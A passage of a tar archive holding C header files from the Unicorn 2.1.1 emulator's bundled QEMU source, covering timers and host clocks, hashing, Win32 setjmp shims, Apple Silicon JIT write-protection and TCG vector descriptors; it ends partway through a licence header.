* * Returns: a pointer to the timer */ static inline QEMUTimer *timer_new_full(QEMUTimerListGroup *timer_list_group, QEMUClockType type, int scale, int attributes, QEMUTimerCB *cb, void *opaque) { QEMUTimer *ts = g_malloc0(sizeof(QEMUTimer)); // timer_init_full(ts, timer_list_group, type, scale, attributes, cb, opaque); return ts; } /** * timer_new: * @type: the clock type to use * @scale: the scale value for the timer * @cb: the callback to be called when the timer expires * @opaque: the opaque pointer to be passed to the callback * * Create a new timer with the given scale, * and associate it with the default timer list for the clock type @type. * See timer_new_full for details. * * Returns: a pointer to the timer */ static inline QEMUTimer *timer_new(QEMUClockType type, int scale, QEMUTimerCB *cb, void *opaque) { return timer_new_full(NULL, type, scale, 0, cb, opaque); } /** * timer_new_ns: * @type: the clock type to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Create a new timer with nanosecond scale on the default timer list * associated with the clock. * See timer_new_full for details. * * Returns: a pointer to the newly created timer */ static inline QEMUTimer *timer_new_ns(QEMUClockType type, QEMUTimerCB *cb, void *opaque) { return timer_new(type, SCALE_NS, cb, opaque); } /** * timer_new_us: * @type: the clock type to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Create a new timer with microsecond scale on the default timer list * associated with the clock. * See timer_new_full for details. * * Returns: a pointer to the newly created timer */ static inline QEMUTimer *timer_new_us(QEMUClockType type, QEMUTimerCB *cb, void *opaque) { return timer_new(type, SCALE_US, cb, opaque); } /** * timer_new_ms: * @type: the clock type to associate with the timer * @cb: the callback to call when the timer expires * @opaque: the opaque pointer to pass to the callback * * Create a new timer with millisecond scale on the default timer list * associated with the clock. * See timer_new_full for details. * * Returns: a pointer to the newly created timer */ static inline QEMUTimer *timer_new_ms(QEMUClockType type, QEMUTimerCB *cb, void *opaque) { return timer_new(type, SCALE_MS, cb, opaque); } /** * timer_deinit: * @ts: the timer to be de-initialised * * Deassociate the timer from any timerlist. You should * call timer_del before. After this call, any further * timer_del call cannot cause dangling pointer accesses * even if the previously used timerlist is freed. */ void timer_deinit(QEMUTimer *ts); /** * timer_free: * @ts: the timer * * Free a timer (it must not be on the active list) */ static inline void timer_free(QEMUTimer *ts) { g_free(ts); } /** * timer_del: * @ts: the timer * * Delete a timer from the active list. * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. */ void timer_del(QEMUTimer *ts); /** * timer_mod_ns: * @ts: the timer * @expire_time: the expiry time in nanoseconds * * Modify a timer to expire at @expire_time * * This function is thread-safe but the timer and its timer list must not be * freed while this function is running. 
 */
void timer_mod_ns(QEMUTimer *ts, int64_t expire_time);

/**
 * timer_mod_anticipate_ns:
 * @ts: the timer
 * @expire_time: the expiry time in nanoseconds
 *
 * Modify a timer to expire at @expire_time or the current time,
 * whichever comes earlier.
 *
 * This function is thread-safe but the timer and its timer list must not be
 * freed while this function is running.
 */
void timer_mod_anticipate_ns(QEMUTimer *ts, int64_t expire_time);

/**
 * timer_mod:
 * @ts: the timer
 * @expire_time: the expire time in the units associated with the timer
 *
 * Modify a timer to expire at @expire_time, taking into
 * account the scale associated with the timer.
 *
 * This function is thread-safe but the timer and its timer list must not be
 * freed while this function is running.
 */
void timer_mod(QEMUTimer *ts, int64_t expire_time);

/**
 * timer_mod_anticipate:
 * @ts: the timer
 * @expire_time: the expiry time in nanoseconds
 *
 * Modify a timer to expire at @expire_time or the current time, whichever
 * comes earlier, taking into account the scale associated with the timer.
 *
 * This function is thread-safe but the timer and its timer list must not be
 * freed while this function is running.
 */
void timer_mod_anticipate(QEMUTimer *ts, int64_t expire_time);

/**
 * timer_pending:
 * @ts: the timer
 *
 * Determines whether a timer is pending (i.e. is on the
 * active list of timers, whether or not it has expired yet).
 *
 * Returns: true if the timer is pending
 */
bool timer_pending(QEMUTimer *ts);

/**
 * timer_expired:
 * @timer_head: the timer
 * @current_time: the current time
 *
 * Determines whether a timer has expired.
 *
 * Returns: true if the timer has expired
 */
bool timer_expired(QEMUTimer *timer_head, int64_t current_time);

/**
 * timer_expire_time_ns:
 * @ts: the timer
 *
 * Determine the expiry time of a timer
 *
 * Returns: the expiry time in nanoseconds
 */
uint64_t timer_expire_time_ns(QEMUTimer *ts);

/*
 * General utility functions
 */

/**
 * qemu_timeout_ns_to_ms:
 * @ns: nanosecond timeout value
 *
 * Convert a nanosecond timeout value (or -1) to
 * a millisecond value (or -1), always rounding up.
 *
 * Returns: millisecond timeout value
 */
int qemu_timeout_ns_to_ms(int64_t ns);

/**
 * qemu_soonest_timeout:
 * @timeout1: first timeout in nanoseconds (or -1 for infinite)
 * @timeout2: second timeout in nanoseconds (or -1 for infinite)
 *
 * Calculates the soonest of two timeout values. -1 means infinite, which
 * is later than any other value.
 *
 * Returns: soonest timeout value in nanoseconds (or -1 for infinite)
 */
static inline int64_t qemu_soonest_timeout(int64_t timeout1, int64_t timeout2)
{
    /* we can abuse the fact that -1 (which means infinite) is a maximal
     * value when cast to unsigned. As this is disgusting, it's kept in
     * one inline function.
     */
    return ((uint64_t) timeout1 < (uint64_t) timeout2) ? timeout1 : timeout2;
}

/**
 * init_clocks:
 *
 * Initialise the clock & timer infrastructure
 */
void init_clocks(QEMUTimerListNotifyCB *notify_cb);

int64_t cpu_get_ticks(void);
/* Caller must hold BQL */
void cpu_enable_ticks(void);
/* Caller must hold BQL */
void cpu_disable_ticks(void);

static inline int64_t get_max_clock_jump(void)
{
    /* This should be small enough to prevent excessive interrupts from being
     * generated by the RTC on clock jumps, but large enough to avoid frequent
     * unnecessary resets in idle VMs.
*/ return 60 * NANOSECONDS_PER_SECOND; } /* * Low level clock functions */ #ifdef _WIN32 static inline int64_t get_clock_realtime(void) { // code from https://stackoverflow.com/questions/10905892/equivalent-of-gettimeday-for-windows // >>>>>>>>> const uint64_t EPOCH = ((uint64_t)116444736000000000ULL); long tv_sec, tv_usec; SYSTEMTIME system_time; FILETIME file_time; uint64_t time; GetSystemTime(&system_time); SystemTimeToFileTime(&system_time, &file_time); time = ((uint64_t)file_time.dwLowDateTime); time += ((uint64_t)file_time.dwHighDateTime) << 32; tv_sec = (long)((time - EPOCH) / 10000000L); tv_usec = (long)(system_time.wMilliseconds * 1000); // <<<<<<<<< return tv_sec * 1000000000LL + (tv_usec * 1000); } #else /* get host real time in nanosecond */ static inline int64_t get_clock_realtime(void) { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec * 1000000000LL + (tv.tv_usec * 1000); } #endif /* Warning: don't insert tracepoints into these functions, they are also used by simpletrace backend and tracepoints would cause an infinite recursion! */ #ifdef _WIN32 extern int64_t clock_freq; static inline int64_t get_clock(void) { LARGE_INTEGER ti; QueryPerformanceCounter(&ti); return muldiv64(ti.QuadPart, NANOSECONDS_PER_SECOND, clock_freq); } #else extern int use_rt_clock; static inline int64_t get_clock(void) { if (use_rt_clock) { struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts); return ts.tv_sec * 1000000000LL + ts.tv_nsec; } else { /* XXX: using gettimeofday leads to problems if the date changes, so it should be avoided. */ return get_clock_realtime(); } } #endif /* icount */ int64_t cpu_get_icount_raw(void); int64_t cpu_get_icount(void); int64_t cpu_get_clock(void); int64_t cpu_icount_to_ns(int64_t icount); void cpu_update_icount(CPUState *cpu); /*******************************************/ /* host CPU ticks (if available) */ #if defined(_ARCH_PPC) static inline int64_t cpu_get_host_ticks(void) { int64_t retval; #ifdef _ARCH_PPC64 /* This reads timebase in one 64bit go and includes Cell workaround from: http://ozlabs.org/pipermail/linuxppc-dev/2006-October/027052.html */ __asm__ __volatile__ ("mftb %0\n\t" "cmpwi %0,0\n\t" "beq- $-8" : "=r" (retval)); #else /* http://ozlabs.org/pipermail/linuxppc-dev/1999-October/003889.html */ unsigned long junk; __asm__ __volatile__ ("mfspr %1,269\n\t" /* mftbu */ "mfspr %L0,268\n\t" /* mftb */ "mfspr %0,269\n\t" /* mftbu */ "cmpw %0,%1\n\t" "bne $-16" : "=r" (retval), "=r" (junk)); #endif return retval; } #elif defined(__i386__) static inline int64_t cpu_get_host_ticks(void) { #ifdef _MSC_VER return __rdtsc(); #else int64_t val; asm volatile ("rdtsc" : "=A" (val)); return val; #endif } #elif defined(__x86_64__) static inline int64_t cpu_get_host_ticks(void) { #ifdef _MSC_VER return __rdtsc(); #else uint32_t low,high; int64_t val; asm volatile("rdtsc" : "=a" (low), "=d" (high)); val = high; val <<= 32; val |= low; return val; #endif } #elif defined(__hppa__) static inline int64_t cpu_get_host_ticks(void) { int val; asm volatile ("mfctl %%cr16, %0" : "=r"(val)); return val; } #elif defined(__s390__) static inline int64_t cpu_get_host_ticks(void) { int64_t val; asm volatile("stck 0(%1)" : "=m" (val) : "a" (&val) : "cc"); return val; } #elif defined(__sparc__) static inline int64_t cpu_get_host_ticks (void) { #if defined(_LP64) uint64_t rval; asm volatile("rd %%tick,%0" : "=r"(rval)); return rval; #else /* We need an %o or %g register for this. For recent enough gcc there is an "h" constraint for that. Don't bother with that. 
*/ union { uint64_t i64; struct { uint32_t high; uint32_t low; } i32; } rval; asm volatile("rd %%tick,%%g1; srlx %%g1,32,%0; mov %%g1,%1" : "=r"(rval.i32.high), "=r"(rval.i32.low) : : "g1"); return rval.i64; #endif } #elif defined(__mips__) && \ ((defined(__mips_isa_rev) && __mips_isa_rev >= 2) || defined(__linux__)) /* * binutils wants to use rdhwr only on mips32r2 * but as linux kernel emulate it, it's fine * to use it. * */ #define MIPS_RDHWR(rd, value) { \ __asm__ __volatile__ (".set push\n\t" \ ".set mips32r2\n\t" \ "rdhwr %0, "rd"\n\t" \ ".set pop" \ : "=r" (value)); \ } static inline int64_t cpu_get_host_ticks(void) { /* On kernels >= 2.6.25 rdhwr <reg>, $2 and $3 are emulated */ uint32_t count; static uint32_t cyc_per_count = 0; if (!cyc_per_count) { MIPS_RDHWR("$3", cyc_per_count); } MIPS_RDHWR("$2", count); return (int64_t)(count * cyc_per_count); } #elif defined(__alpha__) static inline int64_t cpu_get_host_ticks(void) { uint64_t cc; uint32_t cur, ofs; asm volatile("rpcc %0" : "=r"(cc)); cur = cc; ofs = cc >> 32; return cur - ofs; } #else /* The host CPU doesn't have an easily accessible cycle counter. Just return a monotonically increasing value. This will be totally wrong, but hopefully better than nothing. */ static inline int64_t cpu_get_host_ticks(void) { return get_clock(); } #endif void init_get_clock(void); #endif ��������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/typedefs.h����������������������������������������������������������0000664�0000000�0000000�00000003120�14675241067�0020535�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_TYPEDEFS_H #define QEMU_TYPEDEFS_H /* * This header is for selectively avoiding #include just to get a * typedef name. * * Declaring a typedef name in its "obvious" place can result in * inclusion cycles, in particular for complete struct and union * types that need more types for their members. It can also result * in headers pulling in many more headers, slowing down builds. * * You can break such cycles and unwanted dependencies by declaring * the typedef name here. * * For struct types used in only a few headers, judicious use of the * struct tag instead of the typedef name is commonly preferable. */ /* * Incomplete struct types * Please keep this list in case-insensitive alphabetical order. */ typedef struct AddressSpace AddressSpace; typedef struct CPUAddressSpace CPUAddressSpace; typedef struct CPUState CPUState; typedef struct FlatView FlatView; typedef struct IOMMUMemoryRegion IOMMUMemoryRegion; typedef struct MemoryListener MemoryListener; typedef struct MemoryMappingList MemoryMappingList; typedef struct MemoryRegion MemoryRegion; typedef struct MemoryRegionCache MemoryRegionCache; typedef struct MemoryRegionSection MemoryRegionSection; typedef struct QEMUTimer QEMUTimer; typedef struct QEMUTimerListGroup QEMUTimerListGroup; typedef struct RAMBlock RAMBlock; typedef struct Range Range; /* * Pointer types * Such typedefs should be limited to cases where the typedef's users * are oblivious of its "pointer-ness". * Please keep this list in case-insensitive alphabetical order. 
*/ typedef struct IRQState *qemu_irq; #endif /* QEMU_TYPEDEFS_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/units.h�������������������������������������������������������������0000664�0000000�0000000�00000000734�14675241067�0020064�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * IEC binary prefixes definitions * * Copyright (C) 2015 Nikunj A Dadhania, IBM Corporation * Copyright (C) 2018 Philippe Mathieu-Daudé <f4bug@amsat.org> * * SPDX-License-Identifier: GPL-2.0-or-later */ #ifndef QEMU_UNITS_H #define QEMU_UNITS_H #define KiB (INT64_C(1) << 10) #define MiB (INT64_C(1) << 20) #define GiB (INT64_C(1) << 30) #define TiB (INT64_C(1) << 40) #define PiB (INT64_C(1) << 50) #define EiB (INT64_C(1) << 60) #endif ������������������������������������unicorn-2.1.1/qemu/include/qemu/xxhash.h������������������������������������������������������������0000664�0000000�0000000�00000007154�14675241067�0020230�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * xxHash - Fast Hash algorithm * Copyright (C) 2012-2016, Yann Collet * * BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php) * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * + Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * + Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
* * You can contact the author at : * - xxHash source repository : https://github.com/Cyan4973/xxHash */ #ifndef QEMU_XXHASH_H #define QEMU_XXHASH_H #include "qemu/bitops.h" #define PRIME32_1 2654435761U #define PRIME32_2 2246822519U #define PRIME32_3 3266489917U #define PRIME32_4 668265263U #define PRIME32_5 374761393U #define QEMU_XXHASH_SEED 1 /* * xxhash32, customized for input variables that are not guaranteed to be * contiguous in memory. */ static inline uint32_t qemu_xxhash7(uint64_t ab, uint64_t cd, uint32_t e, uint32_t f, uint32_t g) { #ifdef _WIN32 uint64_t v1x = QEMU_XXHASH_SEED; v1x += PRIME32_1; v1x += PRIME32_2; uint32_t v1 = v1x; #else uint32_t v1 = QEMU_XXHASH_SEED + PRIME32_1 + PRIME32_2; #endif uint32_t v2 = QEMU_XXHASH_SEED + PRIME32_2; uint32_t v3 = QEMU_XXHASH_SEED + 0; uint32_t v4 = QEMU_XXHASH_SEED - PRIME32_1; uint32_t a = ab; uint32_t b = ab >> 32; uint32_t c = cd; uint32_t d = cd >> 32; uint32_t h32; v1 += a * PRIME32_2; v1 = rol32(v1, 13); v1 *= PRIME32_1; v2 += b * PRIME32_2; v2 = rol32(v2, 13); v2 *= PRIME32_1; v3 += c * PRIME32_2; v3 = rol32(v3, 13); v3 *= PRIME32_1; v4 += d * PRIME32_2; v4 = rol32(v4, 13); v4 *= PRIME32_1; h32 = rol32(v1, 1) + rol32(v2, 7) + rol32(v3, 12) + rol32(v4, 18); h32 += 28; h32 += e * PRIME32_3; h32 = rol32(h32, 17) * PRIME32_4; h32 += f * PRIME32_3; h32 = rol32(h32, 17) * PRIME32_4; h32 += g * PRIME32_3; h32 = rol32(h32, 17) * PRIME32_4; h32 ^= h32 >> 15; h32 *= PRIME32_2; h32 ^= h32 >> 13; h32 *= PRIME32_3; h32 ^= h32 >> 16; return h32; } static inline uint32_t qemu_xxhash2(uint64_t ab) { return qemu_xxhash7(ab, 0, 0, 0, 0); } static inline uint32_t qemu_xxhash4(uint64_t ab, uint64_t cd) { return qemu_xxhash7(ab, cd, 0, 0, 0); } static inline uint32_t qemu_xxhash5(uint64_t ab, uint64_t cd, uint32_t e) { return qemu_xxhash7(ab, cd, e, 0, 0); } static inline uint32_t qemu_xxhash6(uint64_t ab, uint64_t cd, uint32_t e, uint32_t f) { return qemu_xxhash7(ab, cd, e, f, 0); } #endif /* QEMU_XXHASH_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017123�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/cpus.h������������������������������������������������������������0000664�0000000�0000000�00000001111�14675241067�0020240�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_CPUS_H #define QEMU_CPUS_H #include "qemu/timer.h" #include "hw/core/cpu.h" /* cpus.c */ bool qemu_in_vcpu_thread(void); void 
qemu_init_cpu_loop(void); void resume_all_vcpus(struct uc_struct* uc); void cpu_stop_current(struct uc_struct* uc); void cpu_ticks_init(void); /* Unblock cpu */ void qemu_cpu_kick_self(void); void cpu_synchronize_all_states(void); void cpu_synchronize_all_post_reset(void); void cpu_synchronize_all_post_init(void); void cpu_synchronize_all_pre_loadvm(void); void qtest_clock_warp(int64_t dest); void list_cpus(const char *optarg); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/memory_mapping.h��������������������������������������������������0000664�0000000�0000000�00000002320�14675241067�0022314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU memory mapping * * Copyright Fujitsu, Corp. 2011, 2012 * * Authors: * Wen Congyang <wency@cn.fujitsu.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #ifndef MEMORY_MAPPING_H #define MEMORY_MAPPING_H #include "qemu/queue.h" #include "exec/cpu-defs.h" #include "exec/memory.h" /* The physical and virtual address in the memory mapping are contiguous. */ typedef struct MemoryMapping { hwaddr phys_addr; target_ulong virt_addr; ram_addr_t length; QTAILQ_ENTRY(MemoryMapping) next; } MemoryMapping; struct MemoryMappingList { unsigned int num; MemoryMapping *last_mapping; QTAILQ_HEAD(, MemoryMapping) head; }; /* * add or merge the memory region [phys_addr, phys_addr + length) into the * memory mapping's list. The region's virtual address starts with virt_addr, * and is contiguous. The list is sorted by phys_addr. 
/* ==== unicorn-2.1.1/qemu/include/sysemu/os-win32.h ==== */

/*
 * win32 specific declarations
 *
 * Copyright (c) 2003-2008 Fabrice Bellard
 * Copyright (c) 2010 Jes Sorensen <Jes.Sorensen@redhat.com>
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
 * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 * THE SOFTWARE.
 */

#ifndef QEMU_OS_WIN32_H
#define QEMU_OS_WIN32_H

#include <winsock2.h>
#include <windows.h>
#include <winnt.h> // For vectorized handler
#include <ws2tcpip.h>

#if defined(_WIN64)
/* On w64, setjmp is implemented by _setjmp which needs a second parameter.
 * If this parameter is NULL, longjump does no stack unwinding.
 * That is what we need for QEMU. Passing the value of register rsp (default)
 * lets longjmp try a stack unwinding which will crash with generated code. */
#if defined(_MSC_VER) // MSVC
// See qemu/include/utils/setjmp-wrapper-win32.asm for details.
extern int _setjmp_wrapper(jmp_buf);

#undef setjmp
#define setjmp(env) _setjmp_wrapper(env)
#else // MingW
#undef setjmp
#define setjmp(env) _setjmp(env, NULL)
#endif
#endif

/* QEMU uses sigsetjmp()/siglongjmp() as the portable way to specify
 * "longjmp and don't touch the signal masks". Since we know that the
 * savemask parameter will always be zero we can safely define these
 * in terms of setjmp/longjmp on Win32.
 */
#define sigjmp_buf jmp_buf
#define sigsetjmp(env, savemask) setjmp(env)
#define siglongjmp(env, val) longjmp(env, val)

int getpagesize(void);

#endif
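
/*
 * Usage sketch (not part of the original header, assuming <setjmp.h> is
 * available): QEMU-style code saves a resume point with sigsetjmp(env, 0)
 * and unwinds back to it with siglongjmp(); on w64 the setjmp redefinition
 * above keeps longjmp from walking the stack through generated code. All
 * names below are hypothetical.
 */
#if 0 /* illustrative only */
static sigjmp_buf example_env;

static void example_bail_out(void)
{
    siglongjmp(example_env, 1);   /* no stack unwinding on w64 */
}

static int example_guarded_run(void)
{
    if (sigsetjmp(example_env, 0) == 0) {
        /* First pass: run code that may siglongjmp() back here. */
        example_bail_out();
    }
    return 1;   /* resumed here after siglongjmp */
}
#endif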
/* ==== unicorn-2.1.1/qemu/include/sysemu/sysemu.h ==== */

#ifndef SYSEMU_H
#define SYSEMU_H

struct uc_struct;

void qemu_system_reset_request(struct uc_struct*);
void qemu_system_shutdown_request(struct uc_struct*);

#endif

/* ==== unicorn-2.1.1/qemu/include/sysemu/tcg.h ==== */

/*
 * QEMU TCG support
 *
 * This work is licensed under the terms of the GNU GPL, version 2 or later.
 * See the COPYING file in the top-level directory.
 */

#ifndef SYSEMU_TCG_H
#define SYSEMU_TCG_H

#include <stdbool.h>
#include <stdint.h>

//#include "uc_priv.h"
struct uc_struct;

void tcg_exec_init(struct uc_struct *uc, uint32_t tb_size);

#endif
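
/*
 * Usage sketch (not part of the original headers): a Unicorn engine
 * instance initializes the TCG translator once via tcg_exec_init(); it is
 * assumed here, not confirmed by this header, that a tb_size of 0 selects
 * a default translation-buffer size. The function name is hypothetical.
 */
#if 0 /* illustrative only */
static void example_engine_init(struct uc_struct *uc)
{
    tcg_exec_init(uc, 0);
}
#endif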
/* ==== unicorn-2.1.1/qemu/include/tcg/tcg-apple-jit.h ==== */

/*
 * Apple Silicon APRR functions for JIT handling
 *
 * Copyright (c) 2020 osy
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

/*
 * Credits to: https://siguza.github.io/APRR/
 * Reversed from /usr/lib/system/libsystem_pthread.dylib
 */

#ifndef TCG_APPLE_JIT_H
#define TCG_APPLE_JIT_H

#if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && \
    defined(HAVE_SPRR) && (defined(__arm__) || defined(__aarch64__))

/* write protect enable = write disable */
static inline void jit_write_protect(int enabled)
{
    return pthread_jit_write_protect_np(enabled);
}

// Returns the S3_6_c15_c1_5 register's value
// Taken from
// https://stackoverflow.com/questions/70019553/lldb-how-to-read-the-permissions-of-a-memory-region-for-a-thread
// https://blog.svenpeter.dev/posts/m1_sprr_gxf/
static inline uint64_t read_sprr_perm(void)
{
    uint64_t v;
    __asm__ __volatile__("isb sy\n"
                         "mrs %0, S3_6_c15_c1_5\n"
                         : "=r"(v)::"memory");
    return v;
}

__attribute__((unused)) static inline uint8_t thread_mask()
{
    uint64_t v = read_sprr_perm();
    return (v >> 20) & 3;
}

__attribute__((unused)) static inline bool thread_writeable()
{
    return thread_mask() == 3;
}

__attribute__((unused)) static inline bool thread_executable()
{
    return thread_mask() == 1;
}

#define JIT_CALLBACK_GUARD(x)                                \
    {                                                        \
        bool executable = uc->current_executable;            \
        assert(executable == thread_executable());           \
        x;                                                   \
        if (executable != thread_executable()) {             \
            jit_write_protect(executable);                   \
        }                                                    \
    }

#define JIT_CALLBACK_GUARD_VAR(var, x)                       \
    {                                                        \
        bool executable = uc->current_executable;            \
        assert(executable == thread_executable());           \
        var = x;                                             \
        if (executable != thread_executable()) {             \
            jit_write_protect(executable);                   \
        }                                                    \
    }

#else /* defined(__aarch64__) && defined(CONFIG_DARWIN) */

static inline void jit_write_protect(int enabled)
{
    return;
}

#define JIT_CALLBACK_GUARD(x)                                \
    {                                                        \
        (void)uc;                                            \
        x;                                                   \
    }

#define JIT_CALLBACK_GUARD_VAR(var, x)                       \
    {                                                        \
        (void)uc;                                            \
        var = x;                                             \
    }

#endif

#endif /* define TCG_APPLE_JIT_H */
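
/*
 * Usage sketch (not part of the original header): on Apple Silicon a
 * thread's JIT pages are either writable or executable, never both, so
 * code patching is bracketed by jit_write_protect() calls; the
 * JIT_CALLBACK_GUARD macros restore the expected state after a user
 * callback that may itself flip it. The function below is hypothetical.
 */
#if 0 /* illustrative only */
static void example_patch_insn(uint32_t *insn, uint32_t value)
{
    jit_write_protect(0);   /* make the JIT region writable */
    *insn = value;          /* patch generated code */
    jit_write_protect(1);   /* flip back to executable */
}
#endif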
/* ==== unicorn-2.1.1/qemu/include/tcg/tcg-gvec-desc.h ==== */

/*
 * Generic vector operation descriptor
 *
 * Copyright (c) 2018 Linaro
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2.1 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef TCG_TCG_GVEC_DESC_H
#define TCG_TCG_GVEC_DESC_H

/* ??? These bit widths are set for ARM SVE, maxing out at 256 byte vectors. */
#define SIMD_OPRSZ_SHIFT 0
#define SIMD_OPRSZ_BITS  5

#define SIMD_MAXSZ_SHIFT (SIMD_OPRSZ_SHIFT + SIMD_OPRSZ_BITS)
#define SIMD_MAXSZ_BITS  5

#define SIMD_DATA_SHIFT  (SIMD_MAXSZ_SHIFT + SIMD_MAXSZ_BITS)
#define SIMD_DATA_BITS   (32 - SIMD_DATA_SHIFT)

/* Create a descriptor from components. */
uint32_t simd_desc(uint32_t oprsz, uint32_t maxsz, int32_t data);

/* Extract the operation size from a descriptor. */
static inline intptr_t simd_oprsz(uint32_t desc)
{
    return (extract32(desc, SIMD_OPRSZ_SHIFT, SIMD_OPRSZ_BITS) + 1) * 8;
}

/* Extract the max vector size from a descriptor. */
static inline intptr_t simd_maxsz(uint32_t desc)
{
    return (extract32(desc, SIMD_MAXSZ_SHIFT, SIMD_MAXSZ_BITS) + 1) * 8;
}

/* Extract the operation-specific data from a descriptor. */
static inline int32_t simd_data(uint32_t desc)
{
    return sextract32(desc, SIMD_DATA_SHIFT, SIMD_DATA_BITS);
}

#endif
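
/*
 * Worked example (not part of the original header, assuming <assert.h> is
 * included and simd_desc() is linked in from its out-of-line definition):
 * the two 5-bit size fields hold (bytes / 8) - 1, so a 16-byte operation
 * stores 1 and the extractors above compute (1 + 1) * 8 = 16; the data
 * field is sign-extended, so negative values round-trip.
 */
#if 0 /* illustrative only */
static void simd_desc_roundtrip(void)
{
    uint32_t desc = simd_desc(16, 16, -3);

    assert(simd_oprsz(desc) == 16);
    assert(simd_maxsz(desc) == 16);
    assert(simd_data(desc) == -3);   /* sign-extended via sextract32 */
}
#endif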
/* ==== unicorn-2.1.1/qemu/include/tcg/tcg-mo.h ==== */

/*
 * Tiny Code Generator for QEMU
 *
 * Copyright (c) 2008 Fabrice Bellard
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy
 * of this software and associated documentation files (the "Software"), to deal
 * in the Software without restriction, including without limitation the rights
 * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the Software is
 * furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
